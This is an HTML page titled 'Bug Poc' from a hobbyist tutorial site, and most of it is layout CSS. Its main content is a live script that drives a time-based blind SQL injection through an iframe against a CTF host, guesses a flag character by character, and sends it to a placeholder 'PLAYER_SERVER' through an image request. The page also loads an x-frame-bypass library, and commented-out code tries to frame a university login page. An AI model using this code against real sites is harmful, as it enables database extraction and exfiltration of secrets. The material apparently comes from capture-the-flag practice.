<!doctype html>
<html class="no-js" lang="en">

<head>
  <meta charset="utf-8">
  <title>
    Bug Poc</title>
  <meta name="description" content="bug poc.">


  <meta name="viewport" content="width=device-width, initial-scale=1">

  <link rel="manifest" href="../site.webmanifest">
  <link rel="apple-touch-icon" href="../logo2.jpg">
  <!-- Place favicon.ico in the root directory -->


  <link rel="stylesheet" href="../normalize.css">
  <link rel="stylesheet" href="../br-css/br-main.css">
  <link rel="stylesheet" href="../br-css/br-lab-theme.css">
  <link rel="stylesheet"
    href="https://maxst.icons8.com/vue-static/landings/line-awesome/line-awesome/1.3.0/css/line-awesome.min.css">
  <script src="https://unpkg.com/@ungap/custom-elements-builtin"></script>
  <script src="https://unpkg.com/x-frame-bypass" type="module"></script>



  <style>
    /* MAIN */
    :root {
      --primary-color: black;
      --primaryrgb-color: 0, 0, 0;

      --secondary-color: #ccc;
      --secondaryrgb-color: 204, 204, 204;

      --tertiary-color: #eee;
      --tertiaryrgb-color: 238, 238, 238;

      --color: #0F0;
      --elegant-color: #1b2426;
    }

    ::-webkit-scrollbar {
      width: 8px;
      height: 8px;
    }

    ::-webkit-scrollbar-track {
      /* background: #f1f1f1; */
      background: var(--primary-color);
      border-radius: 10px;
    }

    ::-webkit-scrollbar-track-piece {
      background: var(--primary-color);
    }

    ::-webkit-scrollbar-thumb {
      /* background: #888; */
      background: white;
      /* border-radius: 10px; */
      border: 1px solid var(--primary-color);
    }

    ::-webkit-scrollbar-thumb:hover {
      /* background: #555; */
      background: #f1f1f1;
      /* background: white; */
      ;
    }

    ::-webkit-scrollbar-button {
      background: var(--primary-color);
      /* border-radius: 0 10px 10px 0; */
    }

    ::-webkit-scrollbar-corner {}

    ::-webkit-resizer {}



    html,
    select,
    button {
      color: #222;
      font-size: 1em;
      line-height: 1.7;
      font-family: Verdana, sans-serif;
      text-rendering: optimizeSpeed;
    }

    * {
      box-sizing: border-box;
    }

    /*
     * Remove text-shadow in selection highlight:
     * https://twitter.com/miketaylr/status/12228805301
     *
     * Vendor-prefixed and regular ::selection selectors cannot be combined:
     * https://stackoverflow.com/a/16982510/7133471
     *
     * Customize the background color to match your design.
     */

    ::-moz-selection {
      background: #b3d4fc;
      text-shadow: none;
    }

    ::selection {
      background: #b3d4fc;
      text-shadow: none;
    }

    /*
     * A better looking default horizontal rule
     */

    hr {
      display: block;
      height: 1px;
      border: 0;
      border-top: 1px solid #ccc;
      margin: 1em 0;
      padding: 0;
    }

    /*
     * Remove the gap between audio, canvas, iframes,
     * images, videos and the bottom of their containers:
     * https://github.com/h5bp/html5-boilerplate/issues/440
     */

    audio,
    canvas,
    iframe,
    img,
    svg,
    video {
      vertical-align: middle;
    }

    /*
     * Remove default fieldset styles.
     */

    fieldset {
      border: 0;
      margin: 0;
      padding: 0;
    }

    /*
     * Allow only vertical resizing of textareas.
     */

    textarea {
      resize: vertical;
    }

    /* ==========================================================================
       Browser Upgrade Prompt
       ========================================================================== */

    .browserupgrade {
      margin: 0.2em 0;
      background: #ccc;
      color: #000;
      padding: 0.2em 0;
    }

    /* ==========================================================================
       Author's custom styles
       ========================================================================== */

    /* ==========================================================================
       Helper classes
       ========================================================================== */

    /*
     * Hide visually and from screen readers
     */

    .hidden {
      display: none !important;
    }

    /*
    * Hide only visually, but have it available for screen readers:
    * https://snook.ca/archives/html_and_css/hiding-content-for-accessibility
    *
    * 1. For long content, line feeds are not interpreted as spaces and small width
    *    causes content to wrap 1 word per line:
    *    https://medium.com/@jessebeach/beware-smushed-off-screen-accessible-text-5952a4c2cbfe
    */

    .sr-only {
      border: 0;
      clip: rect(0, 0, 0, 0);
      height: 1px;
      margin: -1px;
      overflow: hidden;
      padding: 0;
      position: absolute;
      white-space: nowrap;
      width: 1px;
      /* 1 */
    }

    /*
    * Extends the .sr-only class to allow the element
    * to be focusable when navigated to via the keyboard:
    * https://www.drupal.org/node/897638
    */

    .sr-only.focusable:active,
    .sr-only.focusable:focus {
      clip: auto;
      height: auto;
      margin: 0;
      overflow: visible;
      position: static;
      white-space: inherit;
      width: auto;
    }

    /*
    * Hide visually and from screen readers, but maintain layout
    */

    .invisible {
      visibility: hidden;
    }

    /*
    * Clearfix: contain floats
    *
    * For modern browsers
    * 1. The space content is one way to avoid an Opera bug when the
    *    `contenteditable` attribute is included anywhere else in the document.
    *    Otherwise it causes space to appear at the top and bottom of elements
    *    that receive the `clearfix` class.
    * 2. The use of `table` rather than `block` is only necessary if using
    *    `:before` to contain the top-margins of child elements.
    */

    .clearfix:before,
    .clearfix:after {
      content: " ";
      /* 1 */
      display: table;
      /* 2 */
    }

    .clearfix:after {
      clear: both;
    }

    /* ==========================================================================
       EXAMPLE Media Queries for Responsive Design.
       These examples override the primary ('mobile first') styles.
       Modify as content requires.
       ========================================================================== */

    @media only screen and (min-width: 35em) {
      /* Style adjustments for viewports that meet the condition */
    }

    @media print,
    (-webkit-min-device-pixel-ratio: 1.25),
    (min-resolution: 1.25dppx),
    (min-resolution: 120dpi) {
      /* Style adjustments for high resolution devices */
    }

    /* ==========================================================================
       Print styles.
       Inlined to avoid the additional HTTP request:
       https://www.phpied.com/delay-loading-your-print-css/
       ========================================================================== */

    @media print {

      *,
      *:before,
      *:after {
        background: transparent !important;
        color: #000 !important;
        /* Black prints faster */
        box-shadow: none !important;
        text-shadow: none !important;
      }

      a,
      a:visited {
        text-decoration: underline;
      }

      a[href]:after {
        content: " ("attr(href) ")";
      }

      abbr[title]:after {
        content: " ("attr(title) ")";
      }

      /*
         * Don't show links that are fragment identifiers,
         * or use the `javascript:` pseudo protocol
         */
      a[href^="#"]:after,
      a[href^="javascript:"]:after {
        content: "";
      }

      pre {
        white-space: pre-wrap !important;
      }

      pre,
      blockquote {
        border: 1px solid #999;
        page-break-inside: avoid;
      }

      /*
         * Printing Tables:
         * https://web.archive.org/web/20180815150934/http://css-discuss.incutio.com/wiki/Printing_Tables
         */
      thead {
        display: table-header-group;
      }

      tr,
      img {
        page-break-inside: avoid;
      }

      p,
      h2,
      h3 {
        orphans: 3;
        widows: 3;
      }

      h2,
      h3 {
        page-break-after: avoid;
      }
    }

    /* CONTENT */
    .lpuumslogin-container {
      position: absolute;
      top: 0;
      margin-top: 52px;
      width: 100%;
      height: 100%;
    }

    /* NAV-LOGO */
    .nav-logo {
      padding: 10px 10px 10px 0;
      letter-spacing: 2px;
      color: white;
      animation: blur 5s ease-out normal;
      -webkit-animation: blur 5s ease-out normal;
      text-shadow: 0px 0px 5px black;
      cursor: pointer;
    }

    .nav-logo:nth-child(1) {
      animation-delay: 0.1s;
      -webkit-animation-delay: 0.1s;
    }

    @keyframes blur {
      0% {
        text-shadow: 0 0 100px #fff;
        opacity: 0;
      }

      5% {
        text-shadow: 0 0 90px #fff;
      }

      15% {
        opacity: 1;
      }

      20% {
        text-shadow: 0 0 0px #fff;
      }

      80% {
        text-shadow: 0 0 0px #fff;
      }

      100% {
        color: #fff;
        opacity: 1;
      }
    }

    @-webkit-keyframes blur {
      0% {
        text-shadow: 0 0 100px #fff;
        opacity: 0;
        color: transparent;
      }

      5% {
        text-shadow: 0 0 90px #fff;
      }

      15% {
        opacity: 1;
      }

      20% {
        text-shadow: 0 0 0px #fff;
      }

      80% {
        text-shadow: 0 0 0px #fff;
      }

      100% {
        opacity: 1;
      }
    }


    /* NAV */
    .nav {
      display: flex;
      position: relative;
      background: var(--primary-color);
      padding: 0 1em;
      box-shadow: 0 2px 5px 0 rgba(0, 0, 0, 0.16), 0 2px 10px 0 rgba(0, 0, 0, 0.12);
      position: fixed;
      top: 0;
      width: 100%;
      z-index: 999;
    }

    .nav__bg-wrapper {
      position: absolute;
      left: 0;
      top: 100%;
      visibility: hidden;
      opacity: 0;
      transition: .3s;
      will-change: opacity;
    }

    .nav__bg-wrapper.is-visible {
      visibility: visible;
      opacity: 1;
    }

    .nav__bg {
      width: 300px;
      height: 200px;
      background: white;
      box-shadow: 0 3px 20px rgba(0, 0, 0, 0.4);
      transform-origin: left top;
      will-change: transform;
    }

    .nav__bg.is-animatable {
      transition: .3s;
    }

    .nav__sections {
      display: flex;
      justify-content: center;
      list-style: none;
      margin: 0;
    }

    .nav__section {
      position: relative;
    }

    .nav__section>a {
      text-decoration: none;
      text-shadow: 0px 0px 5px black;
    }

    .nav__section:hover .nav__label,
    .nav__active,
    .br-nav-lab:hover {
      background: black;
      outline: 1px dashed var(--color);
      color: var(--color) !important;
      cursor: pointer;
    }

    .nav__section:hover .nav__links {
      visibility: visible;
      opacity: 1;
    }

    .nav__label {
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100%;
      padding: 10px 15px;
      color: white;
      transition: .3s;
      font-size: 14px;
    }

    .nav__links {
      position: absolute;
      top: 100%;
      left: 0;
      padding: 1.875em;
      visibility: hidden;
      opacity: 0;
      transition: .3s;
    }

    .nav__links--large {
      width: 25em;
    }

    .nav__links--medium {
      width: 18.75em;
    }

    .nav__links--small {
      width: 12.5em;
    }

    .nav__item {
      color: #666;
    }

    .nav__item:not(:last-of-type) {
      margin-bottom: 0.625em;
    }

    .br-nav-lab {
      color: white;
      font-size: 14px;
      right: 1em;
      position: absolute;
      height: 100%;
      padding: 10px;
      text-decoration: none;
      text-shadow: 0px 0px 5px black;
    }

    .br-nav-menu {
      display: none;
      color: white;
      right: 0;
      position: absolute;
      height: 100%;
      text-decoration: none;
      text-shadow: 0px 0px 5px black;
      padding: 0 4px;
    }

    @media screen and (max-width: 999px) {

      .nav__sections {
        display: none;
      }

      .br-nav-lab {
        display: none;
      }

      .br-nav-menu {
        display: block;
      }

    }

    @media screen and (max-width: 300px) {
      .br-inary {
        display: none;
      }
    }

    /* Search */
    .gsc-control-cse {
      border-color: var(--primary-color) !important;
      background-color: var(--primary-color) !important;
      padding: 0 !important;
    }

    .gsc-search-box td {
      border-bottom: none;
      padding: 0 5px !important;
    }

    form.gsc-search-box,
    table.gsc-search-box {
      margin-bottom: 0 !important;
    }

    .gsib_a {
      padding: 0 5px !important;
    }

    .gsc-search-button-v2 {
      border-bottom-right-radius: 8px !important;
      border-top-right-radius: 8px !important;
    }

    /* Search */

  </style>

  <script data-ad-client="ca-pub-1771672755804464" async
    src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

  <meta name="theme-color" content="#fafafa">
</head>

<body>


  <!-- Add site or application content here -->

  <!-- NAV -->
  <div class="nav">
    <div class="nav-logo flex-center" id="nav-logo">
      <i class="las la-terminal la-2x pr-10"></i>
      <b style="border-bottom: 1px solid var(--color);color: var(--color);">B</b>inary&nbsp;<b
        style="border-bottom: 1px solid var(--color);color: var(--color);">R</b>ide&nbsp;<b
        style="color: var(--color);">+</b>&nbsp; <b style="border-bottom: 1px solid var(--color);">LPU UMS</b>
    </div>


    <ul class=" nav__sections">
      <li class="nav__section"><a class="nav__label" href="../br-get-started/index.html" title="Computer Tutorial">Learn Computer Stuff</a>
      </li>
      <li class="nav__section"><a class="nav__label" href="../br-javascript/index.html" title="Javascript Tutorial">Learn Javascript</a>
      </li>
    </ul>

    <a class="br-nav-lab flex-center" href="../br-lab/index.html" title="BR Lab">
      <i class="las la-flask la-2x pr-10"></i> BR Lab
    </a>
  </div>
  <!-- END NAV -->



  <!-- CONTENT -->
  <div class="br-main-container">
    <div class="lpuumslogin-container">

      <div style="height: inherit;">
        <!-- <iframe height="100%" is="x-frame-bypass" src="https://ums.lpu.in/lpuums/" title="LPU UMS LOGIN PAGE"
          width="100%">
        </iframe> -->

        <!-- <iframe height="100%" id="myframe" src="http://calc.buggywebsite.com/" title="LPU UMS LOGIN PAGE" width="100%">
        </iframe> -->

        <!-- <iframe id="myframe" height="100%" width="100%" src="http://calc.buggywebsite.com/frame.html"></iframe>
        <script type="text/javascript">
         document.addEventListener('DOMContentLoaded', function () {
            var f = document.getElementById("myframe").contentWindow;
            // will throw exception
            f.postMessage("hello world!", '*');
         });
        </script> -->
        <iframe name=f id=g></iframe> // The bot will load an URL with the payload
        <script>
          let host = "http://x-oracle-v1.nn9ed.ka0labs.org";

          function gen(x) {
            x = escape(x.replace(/_/g, '\\_'));
            return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23`;
          }

          function gen2(x) {
            x = escape(x);
            return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23`;
          }

          async function query(word, end = false) {
            let h = performance.now();
            f.location = (end ? gen2(word) : gen(word));
            await new Promise(r => {
              g.onload = r;
            });
            let diff = performance.now() - h;
            return diff > 300;
          }

          let alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789'.split('');
          let postfix = '}'

          async function run() {
            let prefix = 'nn9ed{';
            while (true) {
              let i = 0;
              for (i; i < alphabet.length; i++) {
                let c = alphabet[i];
                let t = await query(prefix + c); // Check what chars returns TRUE or FALSE
                console.log(prefix, c, t);
                if (t) {
                  console.log('FOUND!')
                  prefix += c;
                  break;
                }
              }
              if (i == alphabet.length) {
                console.log('missing chars');
                break;
              }
              let t = await query(prefix + '}', true);
              if (t) {
                prefix += '}';
                break;
              }
            }
            new Image().src = 'http://PLAYER_SERVER/?' + prefix; //Exfiltrate the flag
            console.log(prefix);
          }

          run();

        </script>



      </div>


    </div>

  </div>
  <!-- END CONTENT -->






  <!-- Library scripts -->

  <script src="../modernizr-3.8.0.min.js" defer></script>
  <script src="../jquery-3.4.1.min.js">
  </script>
  <script>
    $('#nav-logo').on("click", () => {
      window.location.href = "www.binaryride.github.io";
    })

  </script>
</body>

</html>
